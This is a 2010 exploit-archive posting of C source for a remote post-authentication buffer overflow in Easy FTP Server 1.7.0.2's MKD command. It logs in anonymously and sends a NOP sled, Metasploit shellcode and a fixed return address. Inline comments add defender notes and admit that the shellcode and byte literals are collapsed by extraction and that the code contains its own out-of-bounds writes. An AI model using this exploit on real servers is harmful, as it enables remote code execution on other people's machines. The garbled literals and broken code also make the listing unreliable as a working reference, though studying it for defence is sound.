Easy Ftp Server v1.7.0.2 MKD Remote Post-Authentication BoF
Posted on 04 April 2010
=================================================================== Easy Ftp Server v1.7.0.2 MKD Remote Post-Authentication BoF Exploit ===================================================================
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
//*************************************************************************
// Easy~Ftp Server v1.7.0.2 MKD Remote Post-Authentication BoF Exploit
// ( 11470_x90c.c )
//
// Date: 24/03/2010
// Author: x90c < x90c.org >
//
// Discovered by: loneferret
//
// Exploits by:
// [1] 11470.py (PoC) - loneferret ( Found: 13/02/2010 )
// - http://www.exploit-db.com/exploits/11470
// [2] 11470_x90c.c ( Exploit )
// ( MAGIC RET, Metasploit shellcode )
//*************************************************************************
//
// NOTE(review): this listing is not byte-faithful. The hex escapes in
// `shellcode`, the `'xEC'`-style character constants and the line endings
// inside the printf strings all appear collapsed by the page extraction,
// so the literals below are plain ASCII text rather than the bytes the
// header comment describes (the "228 Bytes" figure does not match
// strlen(shellcode) as printed). Read it as a historical record of the
// technique, not as a compilable source.
//
// Metasploit shellcode ( calc.exe ) - 228 Bytes
static char shellcode[] = {
"xd9xccx31xc9xb1x33xd9x74x24xf4x5bxbax99xe4x93"
"x62x31x53x18x03x53x18x83xc3x9dx06x66x9ex75x4f"
"x89x5fx85x30x03xbaxb4x62x77xcexe4xb2xf3x82x04"
"x38x51x37x9fx4cx7ex38x28xfax58x77xa9xcax64xdb"
"x69x4cx19x26xbdxaex20xe9xb0xafx65x14x3axfdx3e"
"x52xe8x12x4ax26x30x12x9cx2cx08x6cx99xf3xfcxc6"
"xa0x23xacx5dxeaxdbxc7x3axcbxdax04x59x37x94x21"
"xaaxc3x27xe3xe2x2cx16xcbxa9x12x96xc6xb0x53x11"
"x38xc7xafx61xc5xd0x6bx1bx11x54x6exbbxd2xcex4a"
"x3dx37x88x19x31xfcxdex46x56x03x32xfdx62x88xb5"
"xd2xe2xcax91xf6xafx89xb8xafx15x7cxc4xb0xf2x21"
"x60xbax11x36x12xe1x7fxc9x96x9fx39xc9xa8x9fx69"
"xa1x99x14xe6xb6x25xffx42x48x6cxa2xe3xc0x29x36"
"xb6x8dxc9xecxf5xabx49x05x86x48x51x6cx83x15xd5"
"x9cxf9x06xb0xa2xaex27x91xc0x31xbbx79x29xd7x3b"
"x1bx35x1d"
};

// Entry point.
//   argv[1]  target IP (passed to inet_addr(), result unchecked)
//   argv[2]  TCP port; anything outside 1..65535 falls back to 21
// Returns 0 on the normal path, -1 if socket() failed, -2 if connect()
// failed. Note that the "Exploit Failed" branch also returns 0 (err is
// never set there).
//
// Defender's reading of the flow: the client logs in as anonymous, then
// sends one MKD command whose argument is several hundred bytes long.
// The overflow is in how the server handles that argument length, so a
// server-side bound on command-argument length is the root fix, and an
// FTP command line of this size (or a run of 0x90 bytes in an MKD
// argument) is a reasonable detection signal on the wire. The "denied."
// check near the end shows that denying MKD to the anonymous account
// blocks this particular reproduction, since the bug is only reachable
// after login.
int main(int argc, char *argv[]) {
    int sockfd;
    struct sockaddr_in sa;
    char rbuf[128];   // never NUL-terminated and recv() results are ignored; see strstr() notes below
    char x0x[278];    // the single MKD command line sent to the server
    int i = 0, j = 0;
    int port = 0;
    int err = 0;
    printf(" *********************************************** ");
    printf("* Easy FTP Server 1.7.0.2 MKD Remote BoF * ");
    printf("* Found by: loneferret * ");
    printf("* - http://www.exploit-db.com/exploits/11470 * 
");
    printf("* - 11470_x90c.c - x90c * ");
    printf("*************************************************** ");
    if( argc < 3 ) {
        printf("Usage: %s <Target IP> <Port> ", argv[0]);
        exit(1);
    }
    // atoi() gives 0 for non-numeric input, which the range check below
    // silently turns into port 21.
    port = atoi(argv[2]);
    if(port <= 0 || port > 65535) {
        port = 21;
    }
    printf("[PORT] %d/tcp ", port);
    memset(&sa, 0, sizeof(sa));
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = inet_addr(argv[1]);   // INADDR_NONE on a malformed address is not checked
    sa.sin_port = htons(port);
    if((sockfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        err = -1;
        fprintf(stderr, "[!] Socket failed ");
        goto out;
    }
    // Socket Connect
    if(connect(sockfd, (struct sockaddr *)&sa, sizeof(struct sockaddr)) == -1) {
        err = -2;
        fprintf(stderr, "[!] Connection failed! ");
        goto out;
    }
    printf("[+] Connected! ");
    // Auth
    // Every recv() below discards its return value and rbuf is never
    // terminated, so the strstr() calls scan an unterminated (initially
    // uninitialized) buffer -- undefined behaviour in the client itself.
    // The "[USER]"/"[PASS]" lines are purely informational; the code does
    // not stop when the login is rejected.
    recv(sockfd, rbuf, sizeof(rbuf), 0);
    send(sockfd, "USER anonymous ", 16, 0);
    recv(sockfd, rbuf, sizeof(rbuf), 0);
    if(strstr(rbuf, "okay") != NULL) printf("[USER] anonymous ");
    send(sockfd, "PASS anonymous ", 16, 0);
    recv(sockfd, rbuf, sizeof(rbuf), 0);
    if(strstr(rbuf, "logged in.") != NULL) printf("[PASS] anonymous ");
    // Fill Payload
    // Layout as built here: bytes 0..3 "MKD ", 0x90 fill, shellcode copied
    // in from offset 20, then the saved-return overwrite at 272..275.
    memset(&x0x, 0x90, sizeof(x0x));
    // The loop bounds only j; nothing checks that 20 + strlen(shellcode)
    // stays below offset 272 (or below sizeof x0x at all). With the literal
    // as printed on this page it does not, so the copy runs off the end of
    // x0x -- a stack overflow inside this program.
    for(i = 20, j = 0; j < strlen(shellcode); j++) x0x[i++] = shellcode[j];
    x0x[0] = 'M'; x0x[1] = 'K'; x0x[2] = 'D'; x0x[3] = ' ';
    // MAGIC RET:
    // # CALL EBP ( EBP Register points to nopsled of this payload when overflowed )
    // # 004041EC FFD5 |CALL EBP
    // #
    //
    // Defender's note: this is a fixed absolute address inside the server
    // image, so the technique depends on that image loading at the same
    // base every time. A relocatable (ASLR-enabled) build, DEP, or a stack
    // cookie on the affected function each breaks the assumption; the
    // argument-length bound mentioned above removes the overflow itself.
    //
    // x0x[278] is one past the end of the 278-element array: an
    // out-of-bounds write (UB). It is also never sent, since send() below
    // transmits exactly 278 bytes.
    x0x[272] = 'xEC'; x0x[273] = 'x41'; x0x[274] = 'x40'; x0x[275] = 'x00'; x0x[276] = ' '; x0x[277] = ' '; x0x[278] = 'x00';
    printf("[+] Sending payload... ");
    // Send payload
    send(sockfd, x0x, 278, 0);
    recv(sockfd, rbuf, sizeof(rbuf), 0);
    // Same unterminated-buffer strstr() issue as in the auth section.
    // "denied." / "too long" are the server's own rejections -- a
    // permission check on MKD or a length limit on its argument is exactly
    // what makes this request fail.
    if((strstr(rbuf, "denied.") != NULL) || (strstr(rbuf, "too long") != NULL)) {
        printf("[!] anonymous account doesn't have permission to MKD command... ");
        printf("[!] Exploit Failed. ;-x ");
        goto out;
    }
    // Reaching here only means the server did not answer with a rejection
    // string; nothing verifies what actually happened on the target.
    printf("[+] Exploited :-) ");
out:
    close(sockfd);
    return err;
}
# Inj3ct0r.com [2010-04-04]